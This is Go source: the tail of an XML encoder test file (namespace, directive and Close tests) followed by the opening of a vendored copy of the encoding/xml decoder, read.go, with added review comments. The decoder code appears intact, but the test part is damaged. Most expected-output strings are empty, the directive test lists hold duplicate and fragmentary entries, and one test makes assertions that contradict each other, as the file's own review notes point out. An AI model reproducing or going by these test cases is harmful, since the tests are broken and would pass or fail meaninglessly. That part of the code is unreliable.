""}, }, false, ""}, }, want: ``, }, { desc: "nested element redefines name space", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"xmlns", "y"}, "space", ""}, {Name{"space", "a"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element creates alias for default name space", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"xmlns", "y"}, "space", ""}, {Name{"space", "a"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element defines default name space with existing prefix", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", 
""}, {Name{"space", "a"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element uses empty attribute name space when default ns defined", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "attr"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "redefine xmlns", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"foo", "xmlns"}, "space", ""}, }, false, ""}, }, want: ``, }, { desc: "xmlns with explicit name space #1", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"xml", "xmlns"}, "space", ""}, }, false, ""}, }, want: ``, }, { desc: "xmlns with explicit name space #2", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{xmlURL, "xmlns"}, "space", ""}, }, false, ""}, }, want: ``, }, { desc: "empty name space declaration is ignored", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "foo"}, "", ""}, }, false, ""}, }, want: ``, }, { desc: "attribute with no name is ignored", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"", ""}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "namespace URL with non-valid name", toks: []Token{ StartElement{Name{"/34", "foo"}, []Attr{ {Name{"/34", "x"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element resets default namespace to empty", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"", "foo"}, []Attr{ {Name{"", "xmlns"}, "", ""}, {Name{"", "x"}, "value", ""}, {Name{"space", "x"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "nested element requires empty default name space", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"", "foo"}, nil, false, ""}, }, want: ``, }, { desc: "attribute uses name space from xmlns", toks: []Token{ 
StartElement{Name{"some/space", "foo"}, []Attr{ {Name{"", "attr"}, "value", ""}, {Name{"some/space", "other"}, "other value", ""}, }, false, ""}, }, want: ``, }, { desc: "default name space should not be used by attributes", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, {Name{"xmlns", "bar"}, "space", ""}, {Name{"space", "baz"}, "foo", ""}, }, false, ""}, StartElement{Name{"space", "baz"}, nil, false, ""}, EndElement{Name{"space", "baz"}, false}, EndElement{Name{"space", "foo"}, false}, }, want: ``, }, { desc: "default name space not used by attributes, not explicitly defined", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, {Name{"space", "baz"}, "foo", ""}, }, false, ""}, StartElement{Name{"space", "baz"}, nil, false, ""}, EndElement{Name{"space", "baz"}, false}, EndElement{Name{"space", "foo"}, false}, }, want: ``, }, { desc: "impossible xmlns declaration", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"", "xmlns"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "bar"}, []Attr{ {Name{"space", "attr"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "reserved namespace prefix -- all lower case", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"http://www.w3.org/2001/xmlSchema-instance", "nil"}, "true", ""}, }, false, ""}, }, want: ``, }, { desc: "reserved namespace prefix -- all upper case", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"http://www.w3.org/2001/XMLSchema-instance", "nil"}, "true", ""}, }, false, ""}, }, want: ``, }, { desc: "reserved namespace prefix -- all mixed case", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"http://www.w3.org/2001/XmLSchema-instance", "nil"}, "true", ""}, }, false, ""}, }, want: ``, }, { desc: "start element with attributes separated by newline", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"", "abc"}, "123", ""}, {Name{"", "xyz"}, "456", "\n"}, }, false, 
""}, }, want: ``, }} func TestEncodeToken(t *testing.T) { loop: for i, tt := range encodeTokenTests { var buf strings.Builder enc := NewEncoder(&buf) var err error for j, tok := range tt.toks { err = enc.EncodeToken(tok) if err != nil && j < len(tt.toks)-1 { t.Errorf("#%d %s token #%d: %v", i, tt.desc, j, err) continue loop } } errorf := func(f string, a ...any) { t.Errorf("#%d %s token #%d:%s", i, tt.desc, len(tt.toks)-1, fmt.Sprintf(f, a...)) } switch { case tt.err != "" && err == nil: errorf(" expected error; got none") continue case tt.err == "" && err != nil: errorf(" got error: %v", err) continue case tt.err != "" && err != nil && tt.err != err.Error(): errorf(" error mismatch; got %v, want %v", err, tt.err) continue } if err := enc.Flush(); err != nil { errorf(" %v", err) continue } if got := buf.String(); got != tt.want { errorf("\ngot %v\nwant %v", got, tt.want) continue } } } func TestProcInstEncodeToken(t *testing.T) { var buf bytes.Buffer enc := NewEncoder(&buf) if err := enc.EncodeToken(ProcInst{"xml", []byte("Instruction")}); err != nil { t.Fatalf("enc.EncodeToken: expected to be able to encode xml target ProcInst as first token, %s", err) } if err := enc.EncodeToken(ProcInst{"Target", []byte("Instruction")}); err != nil { t.Fatalf("enc.EncodeToken: expected to be able to add non-xml target ProcInst") } if err := enc.EncodeToken(ProcInst{"xml", []byte("Instruction")}); err == nil { t.Fatalf("enc.EncodeToken: expected to not be allowed to encode xml target ProcInst when not first token") } } func TestDecodeEncode(t *testing.T) { var in, out bytes.Buffer in.WriteString(` `) dec := NewDecoder(&in) enc := NewEncoder(&out) for tok, err := dec.Token(); err == nil; tok, err = dec.Token() { err = enc.EncodeToken(tok) if err != nil { t.Fatalf("enc.EncodeToken: Unable to encode token (%#v), %v", tok, err) } } } // Issue 9796. Used to fail with GORACE="halt_on_error=1" -race. 
func TestRace9796(t *testing.T) {
	// A and B are local to the test. Two goroutines marshal the same B value
	// concurrently; the test has no assertion beyond both calls completing,
	// so it is only meaningful when run with the race detector enabled.
	type A struct{}
	type B struct {
		C []A `xml:"X>Y"`
	}
	var wg sync.WaitGroup
	for i := 0; i < 2; i++ {
		wg.Add(1)
		go func() {
			// Result and error are discarded.
			Marshal(B{[]A{{}}})
			wg.Done()
		}()
	}
	wg.Wait()
}

// TestIsValidDirective checks that isValidDirective accepts every entry of
// testOK and rejects every entry of testKO.
//
// NOTE(review): testKO contains the empty string three times and several
// entries in both lists look like fragments. Markup inside these literals may
// have been lost when this copy was produced; compare with the upstream test
// before relying on the cases.
func TestIsValidDirective(t *testing.T) {
	testOK := []string{
		"<>",
		"< < > >",
		"' '>' >",
		" ]>",
		" '<' ' doc ANY> ]>",
		">>> a < comment --> [ ] >",
	}
	testKO := []string{
		"<",
		">",
		"",
		"< > > < < >",
		" -->",
		"",
		"'",
		"",
	}
	for _, s := range testOK {
		if !isValidDirective(Directive(s)) {
			t.Errorf("Directive %q is expected to be valid", s)
		}
	}
	for _, s := range testKO {
		if isValidDirective(Directive(s)) {
			t.Errorf("Directive %q is expected to be invalid", s)
		}
	}
}

// Issue 11719. EncodeToken used to silently eat tokens with an invalid type.
//
// The checks below run against one encoder in sequence, so their order matters:
// pointer tokens and the Universe value must be rejected, while the value-typed
// start/end pair for object2 must be accepted and flushed.
func TestSimpleUseOfEncodeToken(t *testing.T) {
	var buf strings.Builder
	enc := NewEncoder(&buf)
	// Pointers to token types are not valid tokens.
	if err := enc.EncodeToken(&StartElement{Name: Name{"", "object1"}}); err == nil {
		t.Errorf("enc.EncodeToken: pointer type should be rejected")
	}
	if err := enc.EncodeToken(&EndElement{Name: Name{"", "object1"}}); err == nil {
		t.Errorf("enc.EncodeToken: pointer type should be rejected")
	}
	if err := enc.EncodeToken(StartElement{Name: Name{"", "object2"}}); err != nil {
		t.Errorf("enc.EncodeToken: StartElement %s", err)
	}
	if err := enc.EncodeToken(EndElement{Name: Name{"", "object2"}}); err != nil {
		t.Errorf("enc.EncodeToken: EndElement %s", err)
	}
	// Universe is declared elsewhere in the package; the test expects it to be
	// refused as an invalid token type.
	if err := enc.EncodeToken(Universe{}); err == nil {
		t.Errorf("enc.EncodeToken: invalid type not caught")
	}
	if err := enc.Flush(); err != nil {
		t.Errorf("enc.Flush: %s", err)
	}
	if buf.Len() == 0 {
		t.Errorf("enc.EncodeToken: empty buffer")
	}
	// NOTE(review): want is empty here while the check above requires a
	// non-empty buffer, so as written the two assertions cannot both pass.
	// The expected markup was probably stripped from this copy; restore it
	// from the upstream test.
	want := ""
	if buf.String() != want {
		t.Errorf("enc.EncodeToken: expected %q; got %q", want, buf.String())
	}
}

// Issue 16158. Decoder.unmarshalAttr ignores the return value of copyValue.
func TestIssue16158(t *testing.T) { const data = `` err := Unmarshal([]byte(data), &struct { B byte `xml:"b,attr,omitempty"` }{}) if err == nil { t.Errorf("Unmarshal: expected error, got nil") } } // Issue 20953. Crash on invalid XMLName attribute. type InvalidXMLName struct { XMLName Name `xml:"error"` Type struct { XMLName Name `xml:"type,attr"` } } func TestInvalidXMLName(t *testing.T) { var buf bytes.Buffer enc := NewEncoder(&buf) if err := enc.Encode(InvalidXMLName{}); err == nil { t.Error("unexpected success") } else if want := "invalid tag"; !strings.Contains(err.Error(), want) { t.Errorf("error %q does not contain %q", err, want) } } // Issue 50164. Crash on zero value XML attribute. type LayerOne struct { XMLName Name `xml:"l1"` Value *float64 `xml:"value,omitempty"` *LayerTwo `xml:",omitempty"` } type LayerTwo struct { ValueTwo *int `xml:"value_two,attr,omitempty"` } func TestMarshalZeroValue(t *testing.T) { proofXml := `1.2345` var l1 LayerOne err := Unmarshal([]byte(proofXml), &l1) if err != nil { t.Fatalf("unmarshal XML error: %v", err) } want := float64(1.2345) got := *l1.Value if got != want { t.Fatalf("unexpected unmarshal result, want %f but got %f", want, got) } // Marshal again (or Encode again) // In issue 50164, here `Marshal(l1)` will panic because of the zero value of xml attribute ValueTwo `value_two`. 
anotherXML, err := Marshal(l1) if err != nil { t.Fatalf("marshal XML error: %v", err) } if string(anotherXML) != proofXml { t.Fatalf("unexpected unmarshal result, want %q but got %q", proofXml, anotherXML) } } var closeTests = []struct { desc string toks []Token want string err string }{{ desc: "unclosed start element", toks: []Token{ StartElement{Name{"", "foo"}, nil, false, ""}, }, want: ``, err: "unclosed tag ", }, { desc: "closed element", toks: []Token{ StartElement{Name{"", "foo"}, nil, false, ""}, EndElement{Name{"", "foo"}, false}, }, want: ``, }, { desc: "directive", toks: []Token{ Directive("foo"), }, want: ``, }} func TestClose(t *testing.T) { for _, tt := range closeTests { tt := tt t.Run(tt.desc, func(t *testing.T) { var out strings.Builder enc := NewEncoder(&out) for j, tok := range tt.toks { if err := enc.EncodeToken(tok); err != nil { t.Fatalf("token #%d: %v", j, err) } } err := enc.Close() switch { case tt.err != "" && err == nil: t.Error(" expected error; got none") case tt.err == "" && err != nil: t.Errorf(" got error: %v", err) case tt.err != "" && err != nil && tt.err != err.Error(): t.Errorf(" error mismatch; got %v, want %v", err, tt.err) } if got := out.String(); got != tt.want { t.Errorf("\ngot %v\nwant %v", got, tt.want) } t.Log(enc.p.closed) if err := enc.EncodeToken(Directive("foo")); err == nil { t.Errorf("unexpected success when encoding after Close") } }) } } ================================================ FILE: internal/thirdparty/xml/read.go ================================================ // Copyright 2009 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. 
package xml import ( "bytes" "encoding" "errors" "fmt" "reflect" "runtime" "strconv" "strings" ) // BUG(rsc): Mapping between XML elements and data structures is inherently flawed: // an XML element is an order-dependent collection of anonymous // values, while a data structure is an order-independent collection // of named values. // See [encoding/json] for a textual representation more suitable // to data structures. // Unmarshal parses the XML-encoded data and stores the result in // the value pointed to by v, which must be an arbitrary struct, // slice, or string. Well-formed data that does not fit into v is // discarded. // // Because Unmarshal uses the reflect package, it can only assign // to exported (upper case) fields. Unmarshal uses a case-sensitive // comparison to match XML element names to tag values and struct // field names. // // Unmarshal maps an XML element to a struct using the following rules. // In the rules, the tag of a field refers to the value associated with the // key 'xml' in the struct field's tag (see the example above). // // - If the struct has a field of type []byte or string with tag // ",innerxml", Unmarshal accumulates the raw XML nested inside the // element in that field. The rest of the rules still apply. // // - If the struct has a field named XMLName of type Name, // Unmarshal records the element name in that field. // // - If the XMLName field has an associated tag of the form // "name" or "namespace-URL name", the XML element must have // the given name (and, optionally, name space) or else Unmarshal // returns an error. // // - If the XML element has an attribute whose name matches a // struct field name with an associated tag containing ",attr" or // the explicit name in a struct field tag of the form "name,attr", // Unmarshal records the attribute value in that field. 
// // - If the XML element has an attribute not handled by the previous // rule and the struct has a field with an associated tag containing // ",any,attr", Unmarshal records the attribute value in the first // such field. // // - If the XML element contains character data, that data is // accumulated in the first struct field that has tag ",chardata". // The struct field may have type []byte or string. // If there is no such field, the character data is discarded. // // - If the XML element contains comments, they are accumulated in // the first struct field that has tag ",comment". The struct // field may have type []byte or string. If there is no such // field, the comments are discarded. // // - If the XML element contains a sub-element whose name matches // the prefix of a tag formatted as "a" or "a>b>c", unmarshal // will descend into the XML structure looking for elements with the // given names, and will map the innermost elements to that struct // field. A tag starting with ">" is equivalent to one starting // with the field name followed by ">". // // - If the XML element contains a sub-element whose name matches // a struct field's XMLName tag and the struct field has no // explicit name tag as per the previous rule, unmarshal maps // the sub-element to that struct field. // // - If the XML element contains a sub-element whose name matches a // field without any mode flags (",attr", ",chardata", etc), Unmarshal // maps the sub-element to that struct field. // // - If the XML element contains a sub-element that hasn't matched any // of the above rules and the struct has a field with tag ",any", // unmarshal maps the sub-element to that struct field. // // - An anonymous struct field is handled as if the fields of its // value were part of the outer struct. // // - A struct field with tag "-" is never unmarshaled into. 
//
// If Unmarshal encounters a field type that implements the Unmarshaler
// interface, Unmarshal calls its UnmarshalXML method to produce the value from
// the XML element. Otherwise, if the value implements
// [encoding.TextUnmarshaler], Unmarshal calls that value's UnmarshalText method.
//
// Unmarshal maps an XML element to a string or []byte by saving the
// concatenation of that element's character data in the string or
// []byte. The saved []byte is never nil.
//
// Unmarshal maps an attribute value to a string or []byte by saving
// the value in the string or slice.
//
// Unmarshal maps an attribute value to an [Attr] by saving the attribute,
// including its name, in the Attr.
//
// Unmarshal maps an XML element or attribute value to a slice by
// extending the length of the slice and mapping the element or attribute
// to the newly created value.
//
// Unmarshal maps an XML element or attribute value to a bool by
// setting it to the boolean value represented by the string. Whitespace
// is trimmed and ignored.
//
// Unmarshal maps an XML element or attribute value to an integer or
// floating-point field by setting the field to the result of
// interpreting the string value in decimal. There is no check for
// overflow. Whitespace is trimmed and ignored.
//
// NOTE(review): copyValue in this file parses numeric text with the
// destination field's bit size and returns the strconv error, so a value
// that does not fit the field is expected to fail the decode rather than
// wrap. The "no check for overflow" sentence above looks stale; confirm
// against copyValue before relying on either reading.
//
// Unmarshal maps an XML element to a Name by recording the element
// name.
//
// Unmarshal maps an XML element to a pointer by setting the pointer
// to a freshly allocated value and then mapping the element to that value.
//
// A missing element or empty attribute value will be unmarshaled as a zero value.
// If the field is a slice, a zero value will be appended to the field. Otherwise, the
// field will be set to its zero value.
func Unmarshal(data []byte, v any) error {
	// The whole input is already in memory; it is wrapped in a reader and
	// handed to a fresh Decoder.
	return NewDecoder(bytes.NewReader(data)).Decode(v)
}

// Decode works like [Unmarshal], except it reads the decoder
// stream to find the start element.
func (d *Decoder) Decode(v any) error {
	// A nil start makes unmarshal read tokens until it meets the next
	// start element in the stream.
	var noStart *StartElement
	return d.DecodeElement(v, noStart)
}

// DecodeElement behaves like [Unmarshal], but the caller supplies the start
// element that v should be decoded from. It suits clients that walk raw
// tokens themselves and hand selected elements over to [Unmarshal]-style
// decoding. v must be a non-nil pointer.
//
// NOTE(review): every call starts unmarshal's depth counter at 0. An
// Unmarshaler that re-enters DecodeElement for nested elements therefore
// gets a fresh maxUnmarshalDepth budget on each call; such types should
// apply their own nesting bound when the input is untrusted.
func (d *Decoder) DecodeElement(v any, start *StartElement) error {
	target := reflect.ValueOf(v)
	switch {
	case target.Kind() != reflect.Pointer:
		return errors.New("non-pointer passed to Unmarshal")
	case target.IsNil():
		return errors.New("nil pointer passed to Unmarshal")
	}
	return d.unmarshal(target.Elem(), start, 0)
}

// UnmarshalError is a string-backed error describing a failure in the
// unmarshaling process.
type UnmarshalError string

// Error returns the message text.
func (e UnmarshalError) Error() string {
	return string(e)
}

// Unmarshaler is implemented by types that decode themselves from an XML
// element.
//
// UnmarshalXML receives the element's start tag and must consume exactly
// that one element from d. An error it returns stops the outer Unmarshal
// call, which returns the same error.
// Two common approaches: decode into a helper value whose layout mirrors the
// XML via d.DecodeElement and copy the result into the receiver, or process
// the element token by token with d.Token.
// UnmarshalXML may not use d.RawToken.
type Unmarshaler interface {
	UnmarshalXML(d *Decoder, start StartElement) error
}

// UnmarshalerAttr is the interface implemented by objects that can unmarshal
// an XML attribute description of themselves.
//
// UnmarshalXMLAttr decodes a single XML attribute.
// If it returns an error, the outer call to [Unmarshal] stops and
// returns that error.
// UnmarshalXMLAttr is used only for struct fields with the
// "attr" option in the field tag.
type UnmarshalerAttr interface {
	UnmarshalXMLAttr(attr Attr) error
}

// receiverType returns the receiver type to use in an expression like "%s.MethodName".
// Unnamed types are wrapped in parentheses.
func receiverType(val any) string {
	t := reflect.TypeOf(val)
	if t.Name() != "" {
		return t.String()
	}
	return "(" + t.String() + ")"
}

// unmarshalInterface unmarshals a single XML element into val.
// start is the opening tag of the element.
//
// val.UnmarshalXML is implementation-supplied code that reads tokens from d.
// The pushEOF/popEOF pair brackets that call: a false result from popEOF is
// reported as an error saying the implementation did not consume the whole
// element, so a custom unmarshaler that stops early is not silently accepted.
func (d *Decoder) unmarshalInterface(val Unmarshaler, start *StartElement) error {
	// Record that decoder must stop at end tag corresponding to start.
	d.pushEOF()

	// unmarshalDepth is raised only for the duration of the custom call.
	// Its consumer is outside this view.
	d.unmarshalDepth++
	err := val.UnmarshalXML(d, *start)
	d.unmarshalDepth--
	if err != nil {
		// Drop the EOF marker before propagating the implementation's error.
		d.popEOF()
		return err
	}

	if !d.popEOF() {
		return fmt.Errorf("xml: %s.UnmarshalXML did not consume entire <%s> element", receiverType(val), start.Name.Local)
	}

	return nil
}

// unmarshalTextInterface unmarshals a single XML element into val.
// The chardata contained in the element (but not its children)
// is passed to the text unmarshaler.
//
// Nesting is tracked with a counter rather than recursion. buf grows with the
// element's direct character data and no size cap is applied here.
func (d *Decoder) unmarshalTextInterface(val encoding.TextUnmarshaler) error {
	var buf []byte
	// depth starts at 1 because the element's start tag was already consumed.
	depth := 1
	for depth > 0 {
		t, err := d.Token()
		if err != nil {
			return err
		}
		switch t := t.(type) {
		case CharData:
			// Only text directly inside the element is kept.
			if depth == 1 {
				buf = append(buf, t.data...)
			}
		case StartElement:
			depth++
		case EndElement:
			depth--
		}
	}
	return val.UnmarshalText(buf)
}

// unmarshalAttr unmarshals a single XML attribute into val.
//
// Order of attempts: UnmarshalerAttr (value, then pointer receiver),
// encoding.TextUnmarshaler (value, then pointer receiver), append to a
// non-byte slice, store into an Attr, and finally copyValue.
func (d *Decoder) unmarshalAttr(val reflect.Value, attr Attr) error {
	// Allocate through a nil pointer so the pointee can be filled in.
	if val.Kind() == reflect.Pointer {
		if val.IsNil() {
			val.Set(reflect.New(val.Type().Elem()))
		}
		val = val.Elem()
	}
	if val.CanInterface() && val.Type().Implements(unmarshalerAttrType) {
		// This is an unmarshaler with a non-pointer receiver,
		// so it's likely to be incorrect, but we do what we're told.
		return val.Interface().(UnmarshalerAttr).UnmarshalXMLAttr(attr)
	}
	if val.CanAddr() {
		pv := val.Addr()
		if pv.CanInterface() && pv.Type().Implements(unmarshalerAttrType) {
			return pv.Interface().(UnmarshalerAttr).UnmarshalXMLAttr(attr)
		}
	}

	// Not an UnmarshalerAttr; try encoding.TextUnmarshaler.
	if val.CanInterface() && val.Type().Implements(textUnmarshalerType) {
		// This is an unmarshaler with a non-pointer receiver,
		// so it's likely to be incorrect, but we do what we're told.
		return val.Interface().(encoding.TextUnmarshaler).UnmarshalText([]byte(attr.Value))
	}
	if val.CanAddr() {
		pv := val.Addr()
		if pv.CanInterface() && pv.Type().Implements(textUnmarshalerType) {
			return pv.Interface().(encoding.TextUnmarshaler).UnmarshalText([]byte(attr.Value))
		}
	}

	if val.Type().Kind() == reflect.Slice && val.Type().Elem().Kind() != reflect.Uint8 {
		// Slice of element values.
		// Grow slice.
		n := val.Len()
		val.Grow(1)
		val.SetLen(n + 1)

		// Recur to read element into slice.
		// On failure the length is restored so no half-filled entry remains.
		if err := d.unmarshalAttr(val.Index(n), attr); err != nil {
			val.SetLen(n)
			return err
		}
		return nil
	}

	// An Attr destination receives the attribute itself, name included.
	if val.Type() == attrType {
		val.Set(reflect.ValueOf(attr))
		return nil
	}

	// copyValue's error is returned to the caller.
	return copyValue(val, []byte(attr.Value))
}

// reflect.Type values compared against or tested with Implements in this file.
var (
	attrType            = reflect.TypeFor[Attr]()
	unmarshalerType     = reflect.TypeFor[Unmarshaler]()
	unmarshalerAttrType = reflect.TypeFor[UnmarshalerAttr]()
	textUnmarshalerType = reflect.TypeFor[encoding.TextUnmarshaler]()
)

// Limits on the depth argument of unmarshal. At or above the applicable limit
// unmarshal returns errUnmarshalDepth instead of descending further; the
// smaller value applies when runtime.GOARCH is "wasm".
const (
	maxUnmarshalDepth     = 10000
	maxUnmarshalDepthWasm = 5000 // go.dev/issue/56498
)

// errUnmarshalDepth is returned by unmarshal when the depth limit is reached.
var errUnmarshalDepth = errors.New("exceeded max depth")

// Unmarshal a single XML element into val.
//
// start is the element's opening tag; when nil, tokens are read until a start
// element is found. depth counts nested unmarshal calls: the recursive calls
// below pass depth+1 and unmarshalPath receives depth so it can do the same,
// which bounds the recursion driven by document nesting.
func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error {
	// && binds tighter than ||: the wasm limit applies only on wasm.
	if depth >= maxUnmarshalDepth || runtime.GOARCH == "wasm" && depth >= maxUnmarshalDepthWasm {
		return errUnmarshalDepth
	}
	// Find start element if we need it.
	if start == nil {
		for {
			tok, err := d.Token()
			if err != nil {
				return err
			}
			if t, ok := tok.(StartElement); ok {
				start = &t
				break
			}
		}
	}

	// Load value from interface, but only if the result will be
	// usefully addressable.
	if val.Kind() == reflect.Interface && !val.IsNil() {
		e := val.Elem()
		if e.Kind() == reflect.Pointer && !e.IsNil() {
			val = e
		}
	}

	if val.Kind() == reflect.Pointer {
		if val.IsNil() {
			val.Set(reflect.New(val.Type().Elem()))
		}
		val = val.Elem()
	}

	// Custom unmarshalers take precedence over the reflection-driven path:
	// Unmarshaler first, then encoding.TextUnmarshaler, each tried on the
	// value and then on its address.
	if val.CanInterface() && val.Type().Implements(unmarshalerType) {
		// This is an unmarshaler with a non-pointer receiver,
		// so it's likely to be incorrect, but we do what we're told.
		return d.unmarshalInterface(val.Interface().(Unmarshaler), start)
	}

	if val.CanAddr() {
		pv := val.Addr()
		if pv.CanInterface() && pv.Type().Implements(unmarshalerType) {
			return d.unmarshalInterface(pv.Interface().(Unmarshaler), start)
		}
	}

	if val.CanInterface() && val.Type().Implements(textUnmarshalerType) {
		return d.unmarshalTextInterface(val.Interface().(encoding.TextUnmarshaler))
	}

	if val.CanAddr() {
		pv := val.Addr()
		if pv.CanInterface() && pv.Type().Implements(textUnmarshalerType) {
			return d.unmarshalTextInterface(pv.Interface().(encoding.TextUnmarshaler))
		}
	}

	// data/comment accumulate text seen in the token loop; the save* values
	// are the destinations chosen below (left invalid when nothing wants the
	// content). sv and tinfo are set only for struct destinations.
	var (
		data         []byte
		saveData     reflect.Value
		comment      []byte
		saveComment  reflect.Value
		saveXML      reflect.Value
		saveXMLIndex int
		saveXMLData  []byte
		saveAny      reflect.Value
		sv           reflect.Value
		tinfo        *typeInfo
		err          error
	)

	switch v := val; v.Kind() {
	default:
		return errors.New("unknown type " + v.Type().String())

	case reflect.Interface:
		// TODO: For now, simply ignore the field. In the near
		// future we may choose to unmarshal the start
		// element on it, if not nil.
		return d.Skip()

	case reflect.Slice:
		typ := v.Type()
		if typ.Elem().Kind() == reflect.Uint8 {
			// []byte
			saveData = v
			break
		}

		// Slice of element values.
		// Grow slice.
		n := v.Len()
		v.Grow(1)
		v.SetLen(n + 1)

		// Recur to read element into slice.
		// The new entry is dropped again if decoding it fails.
		if err := d.unmarshal(v.Index(n), start, depth+1); err != nil {
			v.SetLen(n)
			return err
		}
		return nil

	case reflect.Bool, reflect.Float32, reflect.Float64, reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr, reflect.String:
		// Scalars take the element's accumulated character data.
		saveData = v

	case reflect.Struct:
		typ := v.Type()
		// A Name destination just records the element name.
		if typ == nameType {
			v.Set(reflect.ValueOf(start.Name))
			break
		}

		sv = v
		tinfo, err = getTypeInfo(typ)
		if err != nil {
			return err
		}

		// Validate and assign element name.
		if tinfo.xmlname != nil {
			finfo := tinfo.xmlname
			if finfo.name != "" && finfo.name != start.Name.Local {
				return UnmarshalError("expected element type <" + finfo.name + "> but have <" + start.Name.Local + ">")
			}
			if finfo.xmlns != "" && finfo.xmlns != start.Name.Space {
				e := "expected element <" + finfo.name + "> in name space " + finfo.xmlns + " but have "
				if start.Name.Space == "" {
					e += "no name space"
				} else {
					e += start.Name.Space
				}
				return UnmarshalError(e)
			}
			fv := finfo.value(sv, initNilPointers)
			if _, ok := fv.Interface().(Name); ok {
				fv.Set(reflect.ValueOf(start.Name))
			}
		}

		// Assign attributes.
		for _, a := range start.Attr {
			handled := false
			// any shadows the predeclared identifier inside this loop; it
			// holds the index of the first ",any,attr" field, or -1.
			any := -1
			for i := range tinfo.fields {
				finfo := &tinfo.fields[i]
				switch finfo.flags & fMode {
				case fAttr:
					strv := finfo.value(sv, initNilPointers)
					// A field without a name space matches the attribute
					// in any name space.
					if a.Name.Local == finfo.name && (finfo.xmlns == "" || finfo.xmlns == a.Name.Space) {
						if err := d.unmarshalAttr(strv, a); err != nil {
							return err
						}
						handled = true
					}

				case fAny | fAttr:
					if any == -1 {
						any = i
					}
				}
			}
			// Attributes no named field claimed go to the catch-all field.
			if !handled && any >= 0 {
				finfo := &tinfo.fields[any]
				strv := finfo.value(sv, initNilPointers)
				if err := d.unmarshalAttr(strv, a); err != nil {
					return err
				}
			}
		}

		// Determine whether we need to save character data or comments.
		// Only the first field of each mode is used as the destination.
		for i := range tinfo.fields {
			finfo := &tinfo.fields[i]
			switch finfo.flags & fMode {
			case fCDATA, fCharData:
				if !saveData.IsValid() {
					saveData = finfo.value(sv, initNilPointers)
				}

			case fComment:
				if !saveComment.IsValid() {
					saveComment = finfo.value(sv, initNilPointers)
				}

			case fAny, fAny | fElement:
				if !saveAny.IsValid() {
					saveAny = finfo.value(sv, initNilPointers)
				}

			case fInnerXML:
				if !saveXML.IsValid() {
					saveXML = finfo.value(sv, initNilPointers)
					// Start recording raw input, or note the current offset
					// when an enclosing element is already recording.
					if d.saved == nil {
						saveXMLIndex = 0
						d.saved = new(bytes.Buffer)
					} else {
						saveXMLIndex = d.savedOffset()
					}
				}
			}
		}
	}

	// Find end element.
	// Process sub-elements along the way.
Loop:
	for {
		// Offset before reading the token, so the end tag itself is excluded
		// from the saved inner XML.
		var savedOffset int
		if saveXML.IsValid() {
			savedOffset = d.savedOffset()
		}
		tok, err := d.Token()
		if err != nil {
			return err
		}
		switch t := tok.(type) {
		case StartElement:
			consumed := false
			if sv.IsValid() {
				// unmarshalPath can call unmarshal, so we need to pass the depth through so that
				// we can continue to enforce the maximum recursion limit.
				consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth)
				if err != nil {
					return err
				}
				if !consumed && saveAny.IsValid() {
					consumed = true
					if err := d.unmarshal(saveAny, &t, depth+1); err != nil {
						return err
					}
				}
			}
			// Elements nothing wants are skipped without being decoded.
			if !consumed {
				if err := d.Skip(); err != nil {
					return err
				}
			}

		case EndElement:
			if saveXML.IsValid() {
				saveXMLData = d.saved.Bytes()[saveXMLIndex:savedOffset]
				// Index 0 means this call started the recording, so it
				// also stops it.
				if saveXMLIndex == 0 {
					d.saved = nil
				}
			}
			break Loop

		case CharData:
			if saveData.IsValid() {
				data = append(data, t.data...)
			}

		case Comment:
			if saveComment.IsValid() {
				comment = append(comment, t...)
			}
		}
	}

	// A destination implementing encoding.TextUnmarshaler (by value or by
	// address) receives the text directly; saveData is then cleared so the
	// copyValue call below becomes a no-op.
	if saveData.IsValid() && saveData.CanInterface() && saveData.Type().Implements(textUnmarshalerType) {
		if err := saveData.Interface().(encoding.TextUnmarshaler).UnmarshalText(data); err != nil {
			return err
		}
		saveData = reflect.Value{}
	}

	if saveData.IsValid() && saveData.CanAddr() {
		pv := saveData.Addr()
